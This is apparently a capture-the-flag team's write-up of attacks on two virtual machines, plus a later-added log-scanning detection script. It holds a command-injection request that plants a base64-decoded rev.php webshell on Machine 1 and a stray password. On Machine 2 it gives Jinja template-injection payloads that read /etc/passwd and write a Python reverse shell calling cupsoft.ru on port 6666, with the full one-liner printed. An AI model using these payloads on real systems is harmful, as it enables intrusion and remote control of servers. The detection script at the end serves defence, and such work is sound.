# InnoOpen
## Completed by
Team “CupTeam”:
- shybert
- S0meOdy
- menad
- user3
## Tested devices
Machine|IP
-|-
VM1|158.160.40.203
VM2|158.160.48.7
## Machine 1
The following ports are open on virtual machine VM1:

Port|Service
-|-
22|SSH (OpenSSH 8.9p1) (organizers')
80|HTTP (nginx/1.18.0)
### Directory search
```
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
* FUZZ: admin
[Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 33ms]
* FUZZ: admin/
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
* FUZZ: admin/download.php
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
* FUZZ: admin/index.php
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
* FUZZ: admin/upload.php
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 27ms]
* FUZZ: backups
[Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 28ms]
* FUZZ: backups/
[Status: 200, Size: 1370328, Words: 5198, Lines: 5242, Duration: 38ms]
* FUZZ: backup.tgz
[Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 26ms]
* FUZZ: data/
[Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 26ms]
* FUZZ: data/cache/
[Status: 200, Size: 224, Words: 37, Lines: 8, Duration: 28ms]
* FUZZ: index.php
[Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 44ms]
* FUZZ: LICENSE.txt
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 24ms]
* FUZZ: plugins
[Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 61ms]
* FUZZ: plugins/
```
**backup**


`trun-mailcap"`


```
GET /plugins/InnovationPlugin/lang/flag.php?CMD=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%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%2bCg%3d%3d+|+base64+-d+>+rev.php HTTP/1.1
```
http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.142569
Deformater password rHHY2e
exploit - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1352
## Machine 2
`export ip2=158.160.48.7`
### fast nmap scan
`sudo nmap $ip2`
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 07:00:86:ed:8c:8c:c1:da:f1:53:c3:fa:d9:b4:5c:69 (ECDSA)
|_ 256 35:13:90:06:b3:fd:25:8e:af:81:c1:96:75:0d:a7:03 (ED25519)
25/tcp filtered smtp
Aggressive OS guesses: Linux 5.0 (92%), Linux 5.0 - 5.4 (92%), Linux 5.4 (91%), HP P2000 G3 NAS device (90%), Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 12 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
TBqm4x
### full TCP nmap scan
`sudo nmap -T4 -p- -sC -sV $ip2`
```
SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 070086ed8c8cc1daf153c3fad9b45c69 (ECDSA)
|_ 256 35139006b3fd258eaf81c196750da703 (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 193
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid Request Line 'Invalid HTTP request line: '''
| </body>
| </html>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Sun, 26 Feb 2023 06:23:49 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 2348
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Image Reader</title>
| <!-- Font Awesome -->
| <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css">
| <!-- Bootstrap core CSS -->
| <link href="/static/css/bootstrap.min.css" rel="stylesheet">
| <!-- Material Design Bootstrap -->
| <link href="/static/css/mdb.min.css" rel="stylesheet">
| <!-- Your custom styles (optional) -->
| <link href="/static/css/style.css" rel="stylesheet">
| </head>
| <body>
| <div class="container">
| class="text-center" sty
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Sun, 26 Feb 2023 06:23:50 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
### Payloads
```
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```
```
root:x:0:0:root:/root:/bin/bash
jury:x:1000:1001::/home/jury:/bin/bash
srv_reader:x:1001:1002:,,,:/home/srv_reader:/bin/bash
ubuntu:x:1002:1003:Ubuntu:/home/ubuntu:/bin/bash
```
```
{{ get_flashed_messages.__globals__.__builtins__.open("/home/srv_reader/flag.txt").read() }}
```
```
Flag:
```
1
```
{{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "w").write("import socket,subprocess,os;s=socket.socket") }}
```
2
```
{{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("(socket.AF_INET,socket.SOCK_STREAM);") }}
```
3
```
{{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("s.connect(('cupsoft.ru',6666));") }}
```
4
```
{{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("import pty; pty.spawn('sh')") }}
```
exploit
```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('cupsoft.ru',6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')
```
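Both findings leave recognisable traces in request parameters: the `CMD` request to `flag.php` on Machine 1 and the `{{ ... __globals__ ... }}` template payloads on Machine 2. The following detection sketch is an added example, not part of the team's original report; the log lines are constructed, and the parameter name `q` is hypothetical because the write-up does not say which field of the Image Reader application carried the payload.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines: client IPs, the "q" parameter and all values are
# sample data; only the flag.php path and the CMD parameter come from the write-up.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2023:06:20:01 +0000] "GET /index.php HTTP/1.1" 200 224
203.0.113.5 - - [26/Feb/2023:06:21:10 +0000] "GET /plugins/InnovationPlugin/lang/flag.php?CMD=echo+QUJD+%7C+base64+-d+%3E+rev.php HTTP/1.1" 200 0
203.0.113.9 - - [26/Feb/2023:06:25:42 +0000] "GET /?q=%7B%7B+get_flashed_messages.__globals__.__builtins__+%7D%7D HTTP/1.1" 200 2348
203.0.113.9 - - [26/Feb/2023:06:26:00 +0000] "GET /static/css/style.css?v=1.2 HTTP/1.1" 200 512
"""

# Heuristics applied to each URL-decoded parameter value.
RULES = {
    # Template delimiters followed by a dunder attribute such as __globals__.
    "ssti-dunder-access": re.compile(r"\{\{[^}]*__\w+__"),
    # Characters that chain or substitute shell commands.
    "shell-metachar": re.compile(r"[|;`]|\$\("),
    # Output redirected into a file the web server or an interpreter would run.
    "redirect-to-script": re.compile(r">\s*\S+\.(?:php|py|sh)\b"),
    # Decoding an embedded blob on the server side.
    "base64-decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return (ip, parameter, matched rule names) for each suspicious parameter."""
    m = REQUEST.match(line)
    if not m:
        return []  # not a parsable request line
    hits = []
    # parse_qsl decodes %XX and '+' so the rules see what the application sees.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        matched = sorted(rule for rule, rx in RULES.items() if rx.search(value))
        if matched:
            hits.append((m["ip"], name, matched))
    return hits


def scan(log_text):
    """Scan every line of an access log and collect the hits in order."""
    return [hit for line in log_text.splitlines() for hit in scan_line(line)]


if __name__ == "__main__":
    for ip, param, rules in scan(SAMPLE_LOG):
        print(f"{ip} param={param} rules={','.join(rules)}")
```

Payloads sent in a POST body do not appear in an access log, so the same rules have to run where request bodies are visible, such as a WAF or application-level logging.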